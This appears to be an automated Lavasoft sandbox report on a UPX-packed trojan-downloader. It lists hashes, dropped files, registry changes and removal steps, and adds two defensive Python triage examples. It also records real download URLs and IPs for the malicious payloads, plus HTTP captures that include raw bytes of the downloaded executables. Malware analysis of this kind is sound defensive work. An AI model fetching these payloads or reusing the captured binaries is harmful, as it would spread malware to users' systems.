Detections: HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Generic.14783327 (B) (Emsisoft), Trojan.Generic.14783327 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: be544a694c1caa48e6ac2df4f6421ec3
SHA1: 8a2e9233de4f4e0cd561acf3f787fa2c304f6899
SHA256: 097aad9946dae59bac73d27b63e9f809335e4ed5c370e5c7b1598b3add1d67cc
SSDeep: 12288:QhuzVyM/BisrxyEi64r/SEmUnz9KywQ7Kd21CgNbL8T:zmEijr/S1qz9K5kn
Size: 503296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEiD: Packer UPX Compresor Gratuito (www.upx.sourceforge.net), UPolyX v0.5
Company: no certificate found
Created at: 2015-06-30 18:16:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse). In this run the UPX-packed sample (built with Easy Programming Language, per the eyuyan.com VersionInfo comment) writes two NSIS installers to C:\ (Setup_95101248.exe, fetched from down.shm520.com, and uuuyunbo_53_1248.exe); uuuyunbo_53_1248.exe then downloads setup_30004.exe from d.juezhao123.com into %Program Files%, and Setup_95101248.exe unpacks an NSIS plugin set into %Temp%\nsx2.tmp. All transfers are plain HTTP.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
uuuyunbo_53_1248.exe:1536
%original file name%.exe:652
The Trojan injects its code into the following process(es):
Setup_95101248.exe:1596
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process uuuyunbo_53_1248.exe:1536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\setup_30004.exe (1930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The process Setup_95101248.exe:1596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
The process %original file name%.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Setup_95101248.exe (7386 bytes)
C:\uuuyunbo_53_1248.exe (7386 bytes)
Registry activity
The process uuuyunbo_53_1248.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C EA D3 A1 DC 1D 84 10 AF 4C 78 AE 5C 53 D0 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
Internet Explorer zone-map values are set. All three place additional classes of hosts in the Intranet zone, which has weaker defaults than the Internet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (UNC network paths are treated as Intranet)
"ProxyBypass" = "1" (sites that bypass the proxy are treated as Intranet)
"IntranetName" = "1" (dotless local host names not assigned to another zone are treated as Intranet)
Proxy settings are disabled, so the process's WinINet requests go direct rather than through a configured proxy or PAC file:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Caveat: these three ZoneMap values at 1, together with MigrateProxy, SavedLegacySettings, the Cache\Paths entries and the Cryptography\RNG seed, are also what WinINet, urlmon and the CryptoAPI write the first time a process uses them in a fresh profile. On a sandbox image they corroborate that the process made HTTP requests through WinINet; they are not by themselves evidence that the sample tampered with the browser configuration. The deleted values listed next (a static proxy, its bypass list and the PAC URL) are the part worth verifying on a real host, since removing them alongside ProxyEnable=0 would take the host out of any enforced proxy.
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Setup_95101248.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 48 E5 57 5E C5 41 D8 3B 33 2B DA A0 C2 68 43"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 2A 76 C5 6A 1D A5 78 16 E0 F3 B3 3E E5 E9 2B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
Internet Explorer zone-map values are set, placing additional classes of hosts in the Intranet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (UNC network paths are treated as Intranet)
"ProxyBypass" = "1" (sites that bypass the proxy are treated as Intranet)
"IntranetName" = "1" (dotless local host names not assigned to another zone are treated as Intranet)
Proxy settings are disabled, so the process's WinINet requests go direct rather than through a configured proxy or PAC file:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
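As an added example, not part of the Lavasoft report, the following Python parses a registry-change listing in the format used above and applies the two checks a responder would want from it: whether the user's proxy configuration was torn down (ProxyEnable=0 together with deletion of ProxyServer or AutoConfigURL), and whether the Intranet zone was widened via the ZoneMap flags. The input is a constructed sample made from the report's own lines for %original file name%.exe:652; the function names and the finding labels are mine.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: registry lines for %original file name%.exe:652 copied from the
# report above. Format: "[hive\key]" selects a key; "Name" = "Value" sets a value; under a
# "deletes the following value(s)" heading a bare "Name" line is a deleted value.
REPORT_TEXT = r"""
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"""

KEY_RE = re.compile(r'^\[(.+)\]$')
SET_RE = re.compile(r'^"([^"]+)"\s*=\s*"(.*)"$')
DEL_RE = re.compile(r'^"([^"]+)"$')

RegState = Dict[str, Dict[str, Optional[str]]]  # key -> {value name -> data; None = deleted}


def parse_report(text: str) -> RegState:
    """Parse the report's registry listing; later entries overwrite earlier ones."""
    state: RegState = {}
    key: Optional[str] = None
    deleting = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("in system registry:"):      # section heading
            deleting = "deletes" in line
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            state.setdefault(key, {})
            continue
        if key is None:
            continue
        m = SET_RE.match(line)
        if m:
            state[key][m.group(1)] = m.group(2)
            continue
        m = DEL_RE.match(line)
        if m and deleting:
            state[key][m.group(1)] = None
    return state


INET = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
ZONEMAP = INET + r"\ZoneMap"

# ZoneMap flags; 1 = the named class of hosts is placed in the Intranet zone.
ZONE_FLAGS = {
    "IntranetName": "dotless local host names not assigned to another zone",
    "ProxyBypass": "sites that bypass the proxy",
    "UNCAsIntranet": "UNC network paths",
}


def assess(state: RegState) -> List[str]:
    """Return triage findings. Caveat: WinINet/urlmon also write these values on first
    use in a fresh profile, so a hit means 'check proxy and zone state on the real host',
    not 'tampering proven'."""
    findings: List[str] = []
    inet = state.get(INET, {})
    zonemap = state.get(ZONEMAP, {})
    deleted = sorted(n for n, v in inet.items() if v is None)
    if inet.get("ProxyEnable") == "0" and ({"ProxyServer", "AutoConfigURL"} & set(deleted)):
        findings.append("proxy-removed: ProxyEnable=0 and deleted " + ", ".join(deleted))
    for name, hosts in ZONE_FLAGS.items():
        if zonemap.get(name) == "1":
            findings.append(f"zonemap-widened: {name}=1 ({hosts} treated as Intranet zone)")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_report(REPORT_TEXT)):
        print(finding)
```

The parser keeps deleted values as None rather than dropping them, so a later "sets" section for the same key cannot silently hide a deletion; on a live host the same assess() rules can be fed a dict built from the user's hive instead of from report text.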
Dropped PE files
MD5 | File path |
---|---|
f453688934086e01ed59d73ccfcd2c04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\XxShow\XxTongji.dll |
33ec04738007e665059cf40bc0f0c22b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\BgWorker.dll |
4e09ca0312aeaa4029d5cd50cb99871a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\CheckEnv.dll |
e4ec95271ff1bcebab49bdfed6817a22 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\SkinBtn.dll |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\System.dll |
418a34a689d5f9bb85fc951168749edb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WebCtrl.dll |
f0cb331dd4bd92a6ebce45e7cd1cf5ef | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WndProc.dll |
ab73c0c2a23f913eabdc4cb24b75cbad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\nsDialogs.dll |
0a004e3415d3d4621b427d68650e3679 | c:\Setup_95101248.exe |
728d0bcfaf8ce89b1983bbd7891cf9f8 | c:\uuuyunbo_53_1248.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
uuuyunbo_53_1248.exe:1536
%original file name%.exe:652
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\setup_30004.exe (1930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Setup_95101248.exe (7386 bytes)
C:\uuuyunbo_53_1248.exe (7386 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United Kingdom)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 520192 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 524288 | 430080 | 428032 | 5.37247 | e771329ce39b039ce5a1146ac018b9ec |
.rsrc | 954368 | 77824 | 74240 | 4.59261 | 0bcbc538b675834e4553c6070205a4c5 |
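An added example, not from the report or from Lavasoft's tooling: a minimal PE section-table reader in Python that reproduces the columns above (virtual address, virtual and raw sizes, entropy) and applies the UPX tell visible in the table, a UPX0 section with a 520192-byte virtual size but zero bytes on disk, followed by a UPX1 section holding the compressed image. The input is a constructed, non-executable PE built in memory to mirror that layout (its UPX1 payload is pseudo-random filler, so its entropy is higher than the 5.37 the report measured); real samples can be passed as raw bytes. Section header offsets follow the PE/COFF specification and no third-party module is needed.

```python
import math
import random
import struct
from collections import Counter
from typing import List, NamedTuple


class Section(NamedTuple):
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    raw_offset: int
    entropy: float  # Shannon entropy of the raw bytes, 0..8 bits per byte


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> List[Section]:
    """Walk IMAGE_DOS_HEADER -> IMAGE_NT_HEADERS -> section table (PE/COFF layout)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4                     # IMAGE_FILE_HEADER, 20 bytes
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    off = coff + 20 + opt_size              # first IMAGE_SECTION_HEADER (40 bytes each)
    sections = []
    for _ in range(nsections):
        name, vsize, vaddr, rsize, roff = struct.unpack_from("<8sIIII", pe, off)
        raw = pe[roff:roff + rsize] if rsize else b""
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vaddr, vsize, rsize, roff, shannon_entropy(raw)))
        off += 40
    return sections


def looks_upx_packed(sections: List[Section]) -> bool:
    """UPX tell: UPX0 is empty on disk and filled by the unpacker stub at run time,
    UPX1 carries the compressed image. Fall back to a generic 'large virtual size,
    nothing on disk' check for packers that rename their sections."""
    by_name = {s.name: s for s in sections}
    if "UPX0" in by_name and "UPX1" in by_name:
        return by_name["UPX0"].raw_size == 0 and by_name["UPX0"].virtual_size > 0
    return any(s.raw_size == 0 and s.virtual_size >= 0x10000 for s in sections)


def build_sample_pe() -> bytes:
    """Constructed, non-runnable PE mirroring the report's table: UPX0 (no raw data),
    UPX1 (4 KiB of pseudo-random bytes standing in for compressed code), .rsrc."""
    rng = random.Random(1)
    upx1 = rng.randbytes(4096)
    rsrc = b"RSRC" * 256
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> "PE\0\0" at 0x40
    # Machine=i386, 3 sections, no optional header (size 0), EXECUTABLE|32BIT
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0, 0x0102)
    data_off = 0x40 + 4 + 20 + 3 * 40

    def hdr(name, vsize, vaddr, rsize, roff, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, roff, 0, 0, 0, 0, flags)

    table = (hdr(b"UPX0", 520192, 0x1000, 0, 0, 0xE0000080)
             + hdr(b"UPX1", len(upx1), 0x80000, len(upx1), data_off, 0xE0000040)
             + hdr(b".rsrc", len(rsrc), 0xE9000, len(rsrc), data_off + len(upx1), 0xC0000040))
    return bytes(dos) + b"PE\0\0" + file_hdr + table + upx1 + rsrc


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s.name:8} va=0x{s.virtual_address:06x} vsize={s.virtual_size:7d} "
              f"raw={s.raw_size:5d} entropy={s.entropy:.3f}")
    print("UPX packed:", looks_upx_packed(secs))
```

The raw-size-zero check is the robust signal here: a packer can rename UPX0/UPX1 and pad the compressed section to lower its entropy, but it still needs a large writable region that does not exist on disk for the unpacked image to land in.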
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://bgp5.yandui.com/xlxc/Setup_95101248.exe | |
hxxp://d.juezhao123.com/setup/setup_30004.exe | 58.222.24.189 |
hxxp://down.shm520.com/xlxc/Setup_95101248.exe | 183.131.193.67 |
xiazai.lianmengqudao1.com | 58.220.3.155 |
down.shijiakai.net | 58.220.21.68 |
www.jiuhuabuy.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 14 Aug 2015 19:34:12 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..........................................................................s...........'..............h'...........................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....'.......(...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /xlxc/Setup_95101248.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: down.shm520.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Aug 2015 11:44:19 GMT
Content-Type: application/octet-stream
Content-Length: 1363160
Last-Modified: Wed, 29 Jul 2015 19:29:18 GMT
Connection: keep-alive
ETag: "55b9298e-14ccd8"
X-Server-IP: 183.131.193.67
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....:J.................\..........!1.......p....@..........................0...............................................s....... ..................@............................................................p...............................text...8Z.......\.................. ..`.rdata.......p.......`..............@..@.data...X............r..............@....ndata.......@...........................rsrc........ .......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h>B..H.P.u..u..u...Hr@..X...SV.5p>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e..9}...Dp@........FP.VT........ 